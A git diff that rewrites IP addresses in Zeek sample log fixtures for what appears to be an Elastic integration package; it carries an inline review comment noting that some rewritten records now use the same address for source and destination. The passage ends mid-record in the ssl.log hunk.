-{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"17.253.5.203","username":"user","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]}
-{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"34.206.130.40","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]}
-{"ts":1617081354.277591,"uid":"CdqHhA1AsxBIjmVZ9","id.orig_h":"10.156.0.2","id.orig_p":57896,"id.resp_h":"23.55.163.58","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FM01o54RU9pez8AJba"],"resp_mime_types":["application/ocsp-response"]}
-{"ts":1617081355.599548,"uid":"CxhRTwkHNRsHxBw34","id.orig_h":"10.156.0.2","id.orig_p":55378,"id.resp_h":"52.53.69.85","id.resp_p":80,"trans_depth":1,"version":"1.1","request_body_len":0,"response_body_len":191,"status_code":301,"status_msg":"Moved Permanently","tags":[],"resp_fuids":["FVGTq31RBgKGE02hx7"],"resp_mime_types":["text/html"]}
-{"ts":1617081360.171904,"uid":"CrI5Xg30caNXnNvEse","id.orig_h":"10.156.0.2","id.orig_p":41960,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F8vozz46VoxeAmqLv3"],"resp_mime_types":["application/ocsp-response"]}
-{"ts":1617081364.250251,"uid":"C6oCGd24yB2dZ7y7z7","id.orig_h":"10.156.0.2","id.orig_p":42164,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F1imAq4yUjbwyK7NO2"],"resp_mime_types":["application/ocsp-response"]}
-{"ts":1617081366.285075,"uid":"C7DWRE1zsvxUK9RyW1","id.orig_h":"10.156.0.2","id.orig_p":42292,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FQhm6z1cISaOxMzzR6"],"resp_mime_types":["application/ocsp-response"]}
+{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"89.160.20.156","username":"user","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]}
+{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]}
+{"ts":1617081354.277591,"uid":"CdqHhA1AsxBIjmVZ9","id.orig_h":"10.156.0.2","id.orig_p":57896,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FM01o54RU9pez8AJba"],"resp_mime_types":["application/ocsp-response"]}
+{"ts":1617081355.599548,"uid":"CxhRTwkHNRsHxBw34","id.orig_h":"10.156.0.2","id.orig_p":55378,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.1","request_body_len":0,"response_body_len":191,"status_code":301,"status_msg":"Moved Permanently","tags":[],"resp_fuids":["FVGTq31RBgKGE02hx7"],"resp_mime_types":["text/html"]}
+{"ts":1617081360.171904,"uid":"CrI5Xg30caNXnNvEse","id.orig_h":"10.156.0.2","id.orig_p":41960,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F8vozz46VoxeAmqLv3"],"resp_mime_types":["application/ocsp-response"]}
+{"ts":1617081364.250251,"uid":"C6oCGd24yB2dZ7y7z7","id.orig_h":"10.156.0.2","id.orig_p":42164,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F1imAq4yUjbwyK7NO2"],"resp_mime_types":["application/ocsp-response"]}
+{"ts":1617081366.285075,"uid":"C7DWRE1zsvxUK9RyW1","id.orig_h":"10.156.0.2","id.orig_p":42292,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FQhm6z1cISaOxMzzR6"],"resp_mime_types":["application/ocsp-response"]}
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/intel.log
index ce29b924b0a..b02da37183b 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/intel.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/intel.log
@@ -1 +1 @@
-{"ts":1573030980.989353,"uid":"Ctefoj1tgOPt4D0EK2","id.orig_h":"192.168.1.1","id.orig_p":37598,"id.resp_h":"198.41.0.4","id.resp_p":53,"seen.indicator":"198.41.0.4","seen.indicator_type":"Intel::ADDR","seen.where":"Conn::IN_RESP","seen.node":"worker-1-2","matched":["Intel::ADDR"],"sources":["ETPRO Rep: AbusedTLD Score: 127"]}
+{"ts":1573030980.989353,"uid":"Ctefoj1tgOPt4D0EK2","id.orig_h":"192.168.1.1","id.orig_p":37598,"id.resp_h":"89.160.20.156","id.resp_p":53,"seen.indicator":"89.160.20.156","seen.indicator_type":"Intel::ADDR","seen.where":"Conn::IN_RESP","seen.node":"worker-1-2","matched":["Intel::ADDR"],"sources":["ETPRO Rep: AbusedTLD Score: 127"]}
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/irc.log
index 70b3b834b2b..9fa9fb8c8b9 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/irc.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/irc.log
@@ -1,3 +1,3 @@
-{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"command":"USER","value":"xxxxx","addl":"+iw xxxxx XxxxxxXxxx "}
-{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"user":"xxxxx","command":"NICK","value":"molochtest","addl":"+iw xxxxx XxxxxxXxxx "}
-{"ts":1387554250.706387,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"nick":"molochtest","user":"xxxxx","command":"JOIN","value":"#moloch-fpc","addl":" with channel key: \u0027-\u0027"}
+{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"command":"USER","value":"xxxxx","addl":"+iw xxxxx XxxxxxXxxx "}
+{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"user":"xxxxx","command":"NICK","value":"molochtest","addl":"+iw xxxxx XxxxxxXxxx "}
+{"ts":1387554250.706387,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"nick":"molochtest","user":"xxxxx","command":"JOIN","value":"#moloch-fpc","addl":" with channel key: \u0027-\u0027"}
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/notice.log b/packages/zeek/_dev/deploy/docker/sample_logs/notice.log
index 615f0350d34..16b4052346c 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/notice.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/notice.log
@@ -1,4 +1,4 @@
 {"ts":1320435875.879278,"note":"SSH::Password_Guessing","msg":"172.16.238.1 appears to be guessing SSH passwords (seen in 30 connections).","sub":"Sampled servers: 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136","src":"172.16.238.1","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false}
-{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s","sub":"remote","src":"8.42.77.171","dst":"207.154.238.205","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false}
+{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s","sub":"remote","src":"89.160.20.156","dst":"89.160.20.156","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false}
 {"ts":1617097740.958466,"note":"CaptureLoss::Too_Much_Loss","msg":"The capture loss script detected an estimated loss rate above 88.306%","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0}
-{"ts":1617097929.601155,"uid":"CmvrSS1wIiuOGYCbfi","id.orig_h":"10.156.0.2","id.orig_p":48818,"id.resp_h":"104.154.89.105","id.resp_p":443,"fuid":"F39b0Bdfm3FW1rNS5","proto":"tcp","note":"SSL::Invalid_Server_Cert","msg":"SSL certificate validation failed with (self signed certificate)","sub":"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US","src":"10.156.0.2","dst":"104.154.89.105","p":443,"actions":["Notice::ACTION_LOG"],"suppress_for":3600.0}
\ No newline at end of file
+{"ts":1617097929.601155,"uid":"CmvrSS1wIiuOGYCbfi","id.orig_h":"10.156.0.2","id.orig_p":48818,"id.resp_h":"89.160.20.156","id.resp_p":443,"fuid":"F39b0Bdfm3FW1rNS5","proto":"tcp","note":"SSL::Invalid_Server_Cert","msg":"SSL certificate validation failed with (self signed certificate)","sub":"CN=*.badssl.com,O=BadSSL,L=San 
Francisco,ST=California,C=US","src":"10.156.0.2","dst":"89.160.20.156","p":443,"actions":["Notice::ACTION_LOG"],"suppress_for":3600.0}
\ No newline at end of file
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/ntp.log b/packages/zeek/_dev/deploy/docker/sample_logs/ntp.log
index 9799c888dba..98c494dec42 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/ntp.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/ntp.log
@@ -1,2 +1,2 @@
-{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0}
-{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0}
+{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"89.160.20.156","id.orig_p":38461,"id.resp_h":"89.160.20.156","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0}
+{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"89.160.20.156","id.orig_p":38461,"id.resp_h":"89.160.20.156","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0}
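Review bot: The rewritten Scan::Port_Scan record on the new side gives `src` and `dst` the same address, so the fixture now says "89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156" — a host scanning itself. A sample in which source and destination are identical cannot catch a pipeline that swaps `source.ip`/`destination.ip` or geo-enriches the wrong side, which is the kind of regression these sample logs exist to expose; the same collapse appears in the ntp hunk below (client and server are now the same host) and in the signature, tunnel and sip INVITE/REGISTER hunks. The PR title says the supported addresses are a subset, so presumably more than one is available; keeping `src` as is and using a different supported address for `dst` and inside `msg` would preserve the original's distinct endpoints. Minor: the final record is still written without a trailing newline (`\ No newline at end of file` survives on both sides), and a line-oriented reader may hold that last record back until a newline arrives, so it is worth adding one while the line is being edited.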
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/signature.log b/packages/zeek/_dev/deploy/docker/sample_logs/signature.log
index 4725117d90e..3254e9e084e 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/signature.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/signature.log
@@ -1 +1 @@
-{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "124.51.137.154","src_port": 51617,"dst_addr": "160.218.27.63","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "124.51.137.154: TCP traffic","sub_msg": ""}
+{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "89.160.20.156","src_port": 51617,"dst_addr": "89.160.20.156","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "89.160.20.156: TCP traffic","sub_msg": ""}
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/sip.log b/packages/zeek/_dev/deploy/docker/sample_logs/sip.log
index b15b3f6c5ee..60e4d651f42 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/sip.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/sip.log
@@ -1,5 +1,5 @@ -{"ts":1361916159.055464,"uid":"CPRLCB4eWHdjP852Bk","id.orig_h":"172.16.133.19","id.orig_p":5060,"id.resp_h":"74.63.41.218","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:newyork.voip.ms:5060","request_from":"\u0022AppNeta\u0022 ","request_to":"","response_from":"\u0022AppNeta\u0022 ","response_to":";tag=as023f66a5","call_id":"8694cd7e-976e4fc3-d76f6e38@172.16.133.19","seq":"4127 REGISTER","request_path":["SIP/2.0/UDP 172.16.133.19:5060"],"response_path":["SIP/2.0/UDP 172.16.133.19:5060"],"user_agent":"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267","status_code":401,"status_msg":"Unauthorized","request_body_len":0,"response_body_len":0} -{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"200.57.7.204","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"","request_to":"\u0022francisco@bestel.com\u0022 ","response_from":"","response_to":"\u0022francisco@bestel.com\u0022 ;tag=298852044","call_id":"12013223@200.57.7.195","seq":"1 INVITE","request_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"response_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061","SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0} -{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"200.57.7.205","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan ","request_to":"Ivan ","response_from":"\u0022Ivan\u0022 ","response_to":"\u0022Ivan\u0022 ","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 200.57.7.205:5061;rport"],"response_path":["SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061"],"user_agent":"Verso Softphone release 
1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0} -{"ts":1617119416.928735,"uid":"CR6XQH1Lf2mF9YG7H2","id.orig_h":"193.107.216.13","id.orig_p":5083,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@35.198.74.222","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"767538559354206383610151","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 193.107.216.13:5083"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} -{"ts":1617119923.416653,"uid":"Cf9QMt4ear7ZkX74ti","id.orig_h":"45.134.144.100","id.orig_p":5170,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@35.198.74.222","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"35848812076538877174452","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 127.0.0.1:5170"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} \ No newline at end of file +{"ts":1361916159.055464,"uid":"CPRLCB4eWHdjP852Bk","id.orig_h":"172.16.133.19","id.orig_p":5060,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:newyork.voip.ms:5060","request_from":"\u0022AppNeta\u0022 ","request_to":"","response_from":"\u0022AppNeta\u0022 ","response_to":";tag=as023f66a5","call_id":"8694cd7e-976e4fc3-d76f6e38@172.16.133.19","seq":"4127 REGISTER","request_path":["SIP/2.0/UDP 172.16.133.19:5060"],"response_path":["SIP/2.0/UDP 172.16.133.19:5060"],"user_agent":"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267","status_code":401,"status_msg":"Unauthorized","request_body_len":0,"response_body_len":0} +{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"89.160.20.156","id.orig_p":5061,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"","request_to":"\u0022francisco@bestel.com\u0022 
","response_from":"","response_to":"\u0022francisco@bestel.com\u0022 ;tag=298852044","call_id":"12013223@89.160.20.156","seq":"1 INVITE","request_path":["SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061"],"response_path":["SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061","SIP/2.0/UDP 89.160.20.156","SIP/2.0/UDP 89.160.20.156:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0} +{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"89.160.20.156","id.orig_p":5061,"id.resp_h":"89.160.20.156","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan ","request_to":"Ivan ","response_from":"\u0022Ivan\u0022 ","response_to":"\u0022Ivan\u0022 ","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 89.160.20.156:5061;rport"],"response_path":["SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061"],"user_agent":"Verso Softphone release 1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0} +{"ts":1617119416.928735,"uid":"CR6XQH1Lf2mF9YG7H2","id.orig_h":"89.160.20.156","id.orig_p":5083,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@89.160.20.156","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"767538559354206383610151","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 89.160.20.156:5083"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} +{"ts":1617119923.416653,"uid":"Cf9QMt4ear7ZkX74ti","id.orig_h":"89.160.20.156","id.orig_p":5170,"id.resp_h":"10.156.0.2","id.resp_p":5060,"trans_depth":0,"method":"OPTIONS","uri":"sip:100@89.160.20.156","request_from":"\"sipvicious\"","request_to":"\"sipvicious\"","call_id":"35848812076538877174452","seq":"1 OPTIONS","request_path":["SIP/2.0/UDP 127.0.0.1:5170"],"response_path":[],"user_agent":"friendly-scanner","request_body_len":0} \ No newline 
at end of file
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/snmp.log b/packages/zeek/_dev/deploy/docker/sample_logs/snmp.log
index 84ac5f8f69b..4d278a60ad1 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/snmp.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/snmp.log
@@ -1,2 +1,2 @@
 {"ts":1543877948.916584,"uid":"CnKW1B4w9fpRa6Nkf2","id.orig_h":"192.168.1.2","id.orig_p":59696,"id.resp_h":"192.168.1.1","id.resp_p":161,"duration":7.849924,"version":"2c","community":"public","get_requests":0,"get_bulk_requests":0,"get_responses":8,"set_requests":0,"up_since":1543631204.766508}
-{"ts":1617080496.400704,"uid":"CxtWIB4ECPW89F8mSi","id.orig_h":"184.105.139.67","id.orig_p":37533,"id.resp_h":"10.156.0.2","id.resp_p":161,"duration":0.0,"version":"2c","community":"public","get_requests":4,"get_bulk_requests":0,"get_responses":0,"set_requests":0}
\ No newline at end of file
+{"ts":1617080496.400704,"uid":"CxtWIB4ECPW89F8mSi","id.orig_h":"89.160.20.156","id.orig_p":37533,"id.resp_h":"10.156.0.2","id.resp_p":161,"duration":0.0,"version":"2c","community":"public","get_requests":4,"get_bulk_requests":0,"get_responses":0,"set_requests":0}
\ No newline at end of file
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/ssh.log b/packages/zeek/_dev/deploy/docker/sample_logs/ssh.log
index c4517fbceaa..85ccd975ac4 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/ssh.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/ssh.log
@@ -1,4 +1,4 @@
 {"ts":1562527532.904291,"uid":"CajWfz1b3qnnWT0BU9","id.orig_h":"192.168.1.2","id.orig_p":48380,"id.resp_h":"192.168.1.1","id.resp_p":22,"version":2,"auth_success":false,"auth_attempts":2,"client":"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10","server":"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1","cipher_alg":"chacha20-poly1305@openssh.com","mac_alg":"umac-64-etm@openssh.com","compression_alg":"none","kex_alg":"curve25519-sha256@libssh.org","host_key_alg":"ecdsa-sha2-nistp256","host_key":"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd"}
-{"ts":1617123417.413634,"uid":"COXxsJ3dlSh6ECRYQj","id.orig_h":"51.161.10.160","id.orig_p":38204,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"}
-{"ts":1617123445.61524,"uid":"CZPdXz1jfKSWzIDAeb","id.orig_h":"113.53.238.195","id.orig_p":44164,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"}
-{"ts":1617123450.957272,"uid":"Cha1rs3OamonAZ4Nz6","id.orig_h":"34.86.35.26","id.orig_p":33953,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-ZGrab ZGrab SSH Survey"}
\ No newline at end of file
+{"ts":1617123417.413634,"uid":"COXxsJ3dlSh6ECRYQj","id.orig_h":"89.160.20.156","id.orig_p":38204,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"}
+{"ts":1617123445.61524,"uid":"CZPdXz1jfKSWzIDAeb","id.orig_h":"89.160.20.156","id.orig_p":44164,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"}
+{"ts":1617123450.957272,"uid":"Cha1rs3OamonAZ4Nz6","id.orig_h":"89.160.20.156","id.orig_p":33953,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-ZGrab ZGrab SSH Survey"}
\ No newline at end of file
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/ssl.log b/packages/zeek/_dev/deploy/docker/sample_logs/ssl.log
index 5a94c139767..a8a0385eb0a 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/ssl.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/ssl.log
@@ -1,9 +1,9 @@ -{"ts":1547688736.805088,"uid":"CAOvs1BMFCX2Eh0Y3","id.orig_h":"10.178.98.102","id.orig_p":63199,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FebkbHWVCV8rEEEne","F4BDY41MGUBT6URZMd","FWlfEfiHVkv8evDL3"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} -{"ts":1547688736.80509,"uid":"C3mki91FnnNtm0u1ok","id.orig_h":"10.178.98.102","id.orig_p":63198,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["Fue9H32OmuitQk2zR","FpbiBP215tk2xftxM6","FEdROj1vUzTGw3BIUa"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} -{"ts":1547688736.805527,"uid":"CfGBt82PzCXzHa0iek","id.orig_h":"10.178.98.102","id.orig_p":63197,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FiFLYv3UjeWyv2gcW","FvSsiB1Xi816EMagI9","FWpPS4mjGaAhTRXLf"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert 
